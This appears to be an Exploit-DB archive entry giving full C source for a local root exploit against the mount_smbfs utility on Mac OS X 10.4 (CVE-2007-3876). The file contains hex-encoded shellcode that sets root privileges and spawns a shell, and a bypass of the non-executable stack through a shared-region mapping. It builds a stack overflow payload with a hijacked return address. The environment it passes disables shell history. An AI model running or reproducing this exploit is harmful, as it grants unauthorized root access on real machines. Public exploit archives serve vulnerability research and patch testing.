Apple Mac OSX - 'mount_smbfs' Local Stack Buffer Overflow

EDB-ID:

4759




Platform:

OSX

Date:

2007-12-19


/*
 * Copyright (C) 2007-2008 Subreption LLC. All rights reserved.
 * Visit http://blog.subreption.com for exploit development notes.
 *
 * References:
 *   CVE-2007-3876
 *   http://docs.info.apple.com/article.html?artnum=307179
 *   http://seclists.org/fulldisclosure/2007/Dec/0445.html
 *   http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=633
 *   http://phrack.org/issues.html?issue=64&id=11#article
 *   BID: https://www.securityfocus.com/bid/26926
 *
 *
 * Notes:
 *  We bypass non-executable stack via shared_region_map_file_np(), as
 *  documented in a Phrack 64 article by nemo. This technique has been
 *  restricted in Leopard, but works perfectly in Tiger. Originally we
 *  developed a Ruby exploit but given the reliable nature of nemo's
 *  approach, we decided a C port would be the best option.
 *
 * Compile with: gcc -Wall mount_smbfs_root.c -o mount_smbfs_root
 * Version: 1.0 (+tiger_x86)
 *
 * Distributed under the terms of the Subreption Open Source License v1.0
 * http://static.subreption.com/public/documents/subreption-sosl-1.0.txt
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <mach/vm_prot.h>
#include <mach/i386/vm_types.h>
#include <mach/shared_memory_server.h>
#include <string.h>
#include <unistd.h>

#define BASE_ADDR           0x9ffff000
#define PADDING_SIZE        1040
#define PAYLOAD_SIZE        PADDING_SIZE + 24

/* From osfmk/mach/i386/vm_param.h */
#define I386_PGBYTES        4096
#define I386_PGSHIFT        12
#define PAGE_SIZE           I386_PGBYTES
#define PAGE_SHIFT          I386_PGSHIFT

struct _shared_region_mapping_np {
    mach_vm_address_t   address;
    mach_vm_size_t      size;
    mach_vm_offset_t    file_offset;
    vm_prot_t           max_prot;
    vm_prot_t           init_prot;
};

struct x86_target {
    char ebx[4];
    char esi[4];
    char edi[4];
    char ebp[4];
    char eip[4];
    char saved_eip[4];
    char extra_arg[4];
};

static int force_exploit = 0;

/* Dual PowerPC + IA32 shellcode by nemo and b-r00t.
 * seteuid(0) + setuid(0) + execve()
 */
static char dual_shellcode[] =
"\x5f\x90\xeb\x60\x38\x00\x00\xb7\x38\x60\x00\x00\x44\x00\x00\x02"
"\x38\x00\x00\x17\x38\x60\x00\x00\x44\x00\x00\x02\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x70\x39\x40\x01\x70"
"\x39\x1f\xfe\xcf\x7c\xa8\x29\xae\x38\x7f\xfe\xc8\x90\x61\xff\xf8"
"\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x0a\xfe\xcb\x44\xff\xff\x02"
"\x7c\xa3\x2b\x78\x38\x0a\xfe\x91\x44\xff\xff\x02\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58\x31\xc0\x50\xb0\xb7\x6a\x7f\xcd\x80\x31\xc0\x50"
"\xb0\x17\x6a\x7f\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x54\x54\x53\x53\xb0\x3b\xcd\x80";

/* Unless we are forcing the exploit, exit the process */
void cond_exit(int exitcode) {
    if (!force_exploit)
        exit(exitcode);
}

/* map_shellcode(void) - returns a return address as unsigned long
 * The returned address points to our shellcode, mapped from a temporary file on disk.
 * Most of this code is based on nemo's original example in his Phrack 64 article.
 * If the mapping exists, it will fail and require -f flag to be used for avoiding
 * the exit() calls.
 */
unsigned long map_shellcode(void) {
    int fd = -1;
    unsigned long shellcodeaddr = 0x0;
    struct _shared_region_mapping_np shmreg;
    char tmpbuf[PAGE_SIZE];
    char *tmpfname;
    void *scptr = NULL;

    memset(tmpbuf, 0x90, sizeof(tmpbuf));
    scptr = (tmpbuf + PAGE_SIZE - sizeof(dual_shellcode));

    shmreg.address     = BASE_ADDR;
    shmreg.size        = PAGE_SIZE;
    shmreg.file_offset = 0;
    shmreg.max_prot    = VM_PROT_EXECUTE|VM_PROT_READ|VM_PROT_WRITE;
    shmreg.init_prot   = VM_PROT_EXECUTE|VM_PROT_READ|VM_PROT_WRITE;

    tmpfname = "/tmp/iChat.sock";
    if ((fd = open(tmpfname, O_RDWR|O_CREAT)) == -1) {
        perror("open");
        cond_exit(EXIT_FAILURE);
    }

    memcpy(scptr, dual_shellcode, sizeof(dual_shellcode));

    if (write(fd, tmpbuf, PAGE_SIZE) != PAGE_SIZE) {
        perror("write");
        close(fd);
        cond_exit(EXIT_FAILURE);
    }

    if (syscall(SYS_shared_region_map_file_np, fd, 1, &shmreg, NULL) == -1) {
        perror("shared_region_map_file_np");

        close(fd);
        if (unlink(tmpfname) == -1)
            perror("unlink");

        cond_exit(EXIT_FAILURE);
    }

    if (close(fd) == -1)
        perror("close");

    if (unlink(tmpfname) == -1)
        perror("unlink");

    shellcodeaddr = (unsigned long)(shmreg.address + PAGE_SIZE - sizeof(dual_shellcode));

    fprintf(stdout, "Shellcode mapped: mapping starts at 0x%x, shellcode at %x\n",
            (unsigned)shmreg.address, (unsigned)shellcodeaddr);

    return shellcodeaddr;
}

int main(int argc, char *argv[])
{
    struct x86_target payload_template;
    unsigned long retaddr = 0x0;
    char payload[PAYLOAD_SIZE];
    void *curptr = NULL;

    char *vuln_argv[] = {
        "mount_smbfs",
        "-W",
        "PLACEHOLDER",
        0
    };

    char *vuln_envp[] = {
        "HISTFILE=/dev/null",
        "TERM=xterm-color",
        "PATH=/bin:/sbin:/usr/bin:/usr/sbin",
        "HISTSIZE=1",
        0
    };

    fprintf(stdout, "Mac OS X 10.4.10, 10.4.11 mount_smbfs Local Root exploit\n"
            "Copyright (c) 2007-2008 Subreption LLC. All rights reserved.\n");

    if (argc > 1) {
        if (!strcmp(argv[1], "-f"))
            force_exploit = 1;
    }
    
    retaddr = map_shellcode();

    fprintf(stdout, "Payload size: %u (%u padding bytes), Return address: 0x%x\n",
            (unsigned)sizeof(payload), PADDING_SIZE, (unsigned)retaddr);

    memset(&payload_template, 0, sizeof(payload_template));

    // Copy the correct addresses to the payload_template structure
    memcpy(payload_template.ebx, "\xfe\xca\xfe\xca", 4); // ebx = 0xcafecafe
    memcpy(payload_template.esi, "\xdd\xce\xfa\xde", 4); // esi = 0xdefacedd
    memcpy(payload_template.edi, "\xce\xfa\xed\xfe", 4); // edi = 0xfeedface
    memcpy(payload_template.ebp, "\xef\xfe\xad\xde", 4); // ebp = 0xdeadbeef
    memcpy(payload_template.eip, &retaddr, 4);           // eip = retaddr

    memcpy(payload_template.saved_eip, "\xd0\x02\x01\x90", 4); // saved eip = exit()
    memcpy(payload_template.extra_arg, "\xfd\xf8\xff\xbf", 4); // extra arg = 0xbffff8fd

    // Fill the payload with the initial padding
    curptr = (void *)payload;
    memset(curptr, 0x41, PADDING_SIZE);

    // Copy the payload_template structure to our payload buffer
    curptr = payload + PADDING_SIZE;
    memcpy(curptr, &payload_template, sizeof(payload_template));

    // Set the value to the -W option to point at our payload
    vuln_argv[2] = (char *)payload;

    if (execve("/sbin/mount_smbfs", vuln_argv, vuln_envp) == -1) {
        perror("execve");
        exit(EXIT_FAILURE);
    }

    return 0;
}

// milw0rm.com [2007-12-19]